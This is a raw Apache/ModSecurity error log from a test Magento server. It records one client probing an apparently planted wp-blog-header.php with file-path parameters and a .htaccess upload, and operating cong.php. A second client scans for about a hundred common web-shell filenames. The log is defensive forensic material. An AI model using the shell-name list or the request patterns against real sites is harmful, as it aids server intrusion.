[Wed Mar 25 09:44:46.125113 2026] [:error] [pid 2927245] [client 23.104.213.5:60536] [client 23.104.213.5] ModSecurity: Warning. Matched phrase ".htaccess" at ARGS:name. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: .htaccess found within ARGS:name: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgfkcgsoocL0T42QsrKgAAAAc"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:44:46.125168 2026] [:error] [pid 2927245] [client 23.104.213.5:60536] [client 23.104.213.5] ModSecurity: Warning. Matched phrase ".htaccess" at ARGS:path. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: .htaccess found within ARGS:path: /var/www/magento.test.indacotrentino.com/www/pub/media/.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgfkcgsoocL0T42QsrKgAAAAc"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:44:46.126445 2026] [:error] [pid 2927245] [client 23.104.213.5:60536] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgfkcgsoocL0T42QsrKgAAAAc"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:44:46.126620 2026] [:error] [pid 2927245] [client 23.104.213.5:60536] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgfkcgsoocL0T42QsrKgAAAAc"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:45:23.948966 2026] [php:warn] [pid 2927244] [client 23.104.213.5:1794] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 103, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:45:23.948987 2026] [php:warn] [pid 2927244] [client 23.104.213.5:1794] PHP Warning: Undefined array key "path" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 104, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:45:23.948992 2026] [php:warn] [pid 2927244] [client 23.104.213.5:1794] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 105, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:45:23.948997 2026] [php:warn] [pid 2927244] [client 23.104.213.5:1794] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 119, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:45:23.949001 2026] [php:warn] [pid 2927244] [client 23.104.213.5:1794] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 134, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:47:31.965147 2026] [php:warn] [pid 2927247] [client 23.104.213.5:8546] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 103
[Wed Mar 25 09:47:31.965167 2026] [php:warn] [pid 2927247] [client 23.104.213.5:8546] PHP Warning: Undefined array key "path" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 104
[Wed Mar 25 09:47:31.965172 2026] [php:warn] [pid 2927247] [client 23.104.213.5:8546] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 105
[Wed Mar 25 09:47:31.965177 2026] [php:warn] [pid 2927247] [client 23.104.213.5:8546] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 119
[Wed Mar 25 09:47:31.965181 2026] [php:warn] [pid 2927247] [client 23.104.213.5:8546] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 134
[Wed Mar 25 09:47:43.638219 2026] [:error] [pid 2927244] [client 23.104.213.5:9486] [client 23.104.213.5] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOhLwypuEbDf8eMZyjKNgAAAAU"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:47:43.638775 2026] [:error] [pid 2927244] [client 23.104.213.5:9486] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOhLwypuEbDf8eMZyjKNgAAAAU"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:47:43.638932 2026] [:error] [pid 2927244] [client 23.104.213.5:9486] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOhLwypuEbDf8eMZyjKNgAAAAU"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:48:34.565968 2026] [php:warn] [pid 2925947] [client 23.104.213.5:13084] PHP Warning: rename(index.js,new): No such file or directory in /var/www/magento.test.indacotrentino.com/www/pub/cong.php on line 520, referer: https://autumnus.test.indacotrentino.com/pub/cong.php
[Wed Mar 25 09:48:38.362904 2026] [php:warn] [pid 2925947] [client 23.104.213.5:13084] PHP Warning: rename(index.js,new): No such file or directory in /var/www/magento.test.indacotrentino.com/www/pub/cong.php on line 520, referer: https://autumnus.test.indacotrentino.com/pub/cong.php?action=R&filename=index.js
[Wed Mar 25 09:48:49.897078 2026] [php:warn] [pid 2927246] [client 23.104.213.5:14014] PHP Warning: rename(index.js,new): No such file or directory in /var/www/magento.test.indacotrentino.com/www/pub/cong.php on line 520, referer: https://autumnus.test.indacotrentino.com/pub/cong.php?action=R&filename=index.js
[Wed Mar 25 09:52:36.590446 2026] [php:error] [pid 2927213] [client 23.104.213.5:27978] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-admin.php' not found or unable to stat
[Thu Mar 26 01:51:17.228512 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/gptsh.php' not found or unable to stat
[Thu Mar 26 01:51:17.244545 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/xocx.php' not found or unable to stat
[Thu Mar 26 01:51:17.266901 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/Zero.php' not found or unable to stat
[Thu Mar 26 01:51:17.283127 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/sace.php' not found or unable to stat
[Thu Mar 26 01:51:17.299494 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/up4.php' not found or unable to stat
[Thu Mar 26 01:51:17.315527 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-zx.php' not found or unable to stat
[Thu Mar 26 01:51:17.331508 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/north1.php' not found or unable to stat
[Thu Mar 26 01:51:17.347919 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/420.php' not found or unable to stat
[Thu Mar 26 01:51:17.363846 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fine.php' not found or unable to stat
[Thu Mar 26 01:51:17.380868 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/zample.php' not found or unable to stat
[Thu Mar 26 01:51:17.396875 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/read.php' not found or unable to stat
[Thu Mar 26 01:51:17.412705 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-kd4xalrg7m.php' not found or unable to stat
[Thu Mar 26 01:51:17.428509 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/hplfuns.php' not found or unable to stat
[Thu Mar 26 01:51:17.444982 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/xa.php' not found or unable to stat
[Thu Mar 26 01:51:17.460932 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/100.php' not found or unable to stat
[Thu Mar 26 01:51:17.477390 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/bless13.php' not found or unable to stat
[Thu Mar 26 01:51:17.497527 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-mter.php' not found or unable to stat
[Thu Mar 26 01:51:17.513467 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/inege.php' not found or unable to stat
[Thu Mar 26 01:51:17.530583 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/19.php' not found or unable to stat
[Thu Mar 26 01:51:17.546790 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fe5.php' not found or unable to stat
[Thu Mar 26 01:51:17.563038 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/file61.php' not found or unable to stat
[Thu Mar 26 01:51:17.579004 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/uuu.php' not found or unable to stat
[Thu Mar 26 01:51:17.595837 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/settings.php' not found or unable to stat
[Thu Mar 26 01:51:17.612631 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/sf.php' not found or unable to stat
[Thu Mar 26 01:51:17.628937 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/eee.php' not found or unable to stat
[Thu Mar 26 01:51:17.644910 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/no1.php' not found or unable to stat
[Thu Mar 26 01:51:17.660703 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/w2025.php' not found or unable to stat
[Thu Mar 26 01:51:17.676696 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/swallowable.php' not found or unable to stat
[Thu Mar 26 01:51:17.692815 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fvvff.php' not found or unable to stat
[Thu Mar 26 01:51:17.709911 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/a2.php' not found or unable to stat
[Thu Mar 26 01:51:17.727486 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/sty.php' not found or unable to stat
[Thu Mar 26 01:51:17.743347 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/txets.php' not found or unable to stat
[Thu Mar 26 01:51:17.759865 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/edit.php' not found or unable to stat
[Thu Mar 26 01:51:17.776559 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ioxi-o.php' not found or unable to stat
[Thu Mar 26 01:51:17.809220 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/66.php' not found or unable to stat
[Thu Mar 26 01:51:17.826039 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/a5.php' not found or unable to stat
[Thu Mar 26 01:51:17.842280 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/xmlrpc.php' not found or unable to stat
[Thu Mar 26 01:51:17.859948 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ol.php' not found or unable to stat
[Thu Mar 26 01:51:17.876197 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/f6.php' not found or unable to stat
[Thu Mar 26 01:51:17.893703 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/inputs.php' not found or unable to stat
[Thu Mar 26 01:51:17.909977 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/style.php' not found or unable to stat
[Thu Mar 26 01:51:17.927059 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/bgymj.php' not found or unable to stat
[Thu Mar 26 01:51:17.943368 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/aa.php' not found or unable to stat
[Thu Mar 26 01:51:17.960306 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/1.php' not found or unable to stat
[Thu Mar 26 01:51:17.976393 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/av.php' not found or unable to stat
[Thu Mar 26 01:51:18.009079 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/file59.php' not found or unable to stat
[Thu Mar 26 01:51:18.025720 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/bless5.php' not found or unable to stat
[Thu Mar 26 01:51:18.041983 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-act.php' not found or unable to stat
[Thu Mar 26 01:51:18.058175 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/xqq.php' not found or unable to stat
[Thu Mar 26 01:51:18.074120 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/plss3.php' not found or unable to stat
[Thu Mar 26 01:51:18.090982 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/aaa.php' not found or unable to stat
[Thu Mar 26 01:51:18.107061 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/classwithtostring.php' not found or unable to stat
[Thu Mar 26 01:51:18.141088 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/tinyfilemanager.php' not found or unable to stat
[Thu Mar 26 01:51:18.157587 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ms.php' not found or unable to stat
[Thu Mar 26 01:51:18.174014 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-update.php' not found or unable to stat
[Thu Mar 26 01:51:18.190685 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/sbhu.php' not found or unable to stat
[Thu Mar 26 01:51:18.206533 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-blog.php' not found or unable to stat
[Thu Mar 26 01:51:18.223123 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/test1.php' not found or unable to stat
[Thu Mar 26 01:51:18.256192 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/166.php' not found or unable to stat
[Thu Mar 26 01:51:18.289113 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ms-edit.php' not found or unable to stat
[Thu Mar 26 01:51:18.306151 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/adminfuns.php' not found or unable to stat
[Thu Mar 26 01:51:18.324376 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/goods.php' not found or unable to stat
[Thu Mar 26 01:51:18.344465 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ms-edit.php' not found or unable to stat
[Thu Mar 26 01:51:18.360547 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/222.php' not found or unable to stat
[Thu Mar 26 01:51:18.395171 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/ff1.php' not found or unable to stat
[Thu Mar 26 01:51:18.411874 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fff.php' not found or unable to stat
[Thu Mar 26 01:51:18.445473 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/155.php' not found or unable to stat
[Thu Mar 26 01:51:18.469456 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/we.php' not found or unable to stat
[Thu Mar 26 01:51:18.485831 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/alpha.php' not found or unable to stat
[Thu Mar 26 01:51:18.502558 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/makeasmtp.php' not found or unable to stat
[Thu Mar 26 01:51:18.519003 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-michan.php' not found or unable to stat
[Thu Mar 26 01:51:18.537127 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-the.php' not found or unable to stat
[Thu Mar 26 01:51:18.570206 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/BDKR28WP.php' not found or unable to stat
[Thu Mar 26 01:51:18.607839 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-good.php' not found or unable to stat
[Thu Mar 26 01:51:18.624259 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/wp.php' not found or unable to stat
[Thu Mar 26 01:51:18.658227 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fe5.php' not found or unable to stat
[Thu Mar 26 01:51:18.674852 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/kj.php' not found or unable to stat
[Thu Mar 26 01:51:18.708571 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/av.php' not found or unable to stat
[Thu Mar 26 01:51:18.725928 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/abcd.php' not found or unable to stat
[Thu Mar 26 01:51:18.742513 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/init.php' not found or unable to stat
[Thu Mar 26 01:51:18.759508 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/fi.php' not found or unable to stat
[Thu Mar 26 01:51:18.776057 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/a1.php' not found or unable to stat
[Thu Mar 26 01:51:18.832760 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/f35.php' not found or unable to stat
[Thu Mar 26 01:51:18.889839 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/prv8.php' not found or unable to stat
[Thu Mar 26 01:51:18.907334 2026] [php:error] [pid 2944044] [client 4.232.184.93:20300] script '/var/www/magento.test.indacotrentino.com/www/pub/k.php' not found or unable to stat
[Thu Mar 26 01:51:18.951768 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/dev.php' not found or unable to stat
[Thu Mar 26 01:51:18.968174 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/bal.php' not found or unable to stat
[Thu Mar 26 01:51:18.984529 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/in.php' not found or unable to stat
[Thu Mar 26 01:51:19.000669 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/gssdd.php' not found or unable to stat
[Thu Mar 26 01:51:19.016944 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/motu.php' not found or unable to stat
[Thu Mar 26 01:51:19.033048 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/bs1.php' not found or unable to stat
[Thu Mar 26 01:51:19.049118 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/bengi.php' not found or unable to stat
[Thu Mar 26 01:51:19.084465 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/axx.php' not found or unable to stat
[Thu Mar 26 01:51:19.101131 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/alfashell.php' not found or unable to stat
[Thu Mar 26 01:51:19.117520 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/fm.php' not found or unable to stat
[Thu Mar 26 01:51:19.134085 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/flower.php' not found or unable to stat
[Thu Mar 26 01:51:19.150096 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/gettest.php' not found or unable to stat
[Thu Mar 26 01:51:19.166130 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/acp.php' not found or unable to stat
[Thu Mar 26 01:51:19.182499 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/sdm.php' not found or unable to stat
[Thu Mar 26 01:51:19.203739 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file52.php' not found or unable to stat
[Thu Mar 26 01:51:19.222027 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file48.php' not found or unable to stat
[Thu Mar 26 01:51:19.238472 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/s.php' not found or unable to stat
[Thu Mar 26 01:51:19.261404 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/g.php' not found or unable to stat
[Thu Mar 26 01:51:19.296573 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/simple.php' not found or unable to stat
[Thu Mar 26 01:51:19.313030 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/atomlib.php' not found or unable to stat
[Thu Mar 26 01:51:19.331993 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/hla.php' not found or unable to stat
[Thu Mar 26 01:51:19.348696 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/ew.php' not found or unable to stat
[Thu Mar 26 01:51:19.365914 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/css.php' not found or unable to stat
[Thu Mar 26 01:51:19.382209 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/goat1.php' not found or unable to stat
[Thu Mar 26 01:51:19.398987 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file21.php' not found or unable to stat
[Thu Mar 26 01:51:19.415619 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/class19.php' not found or unable to stat
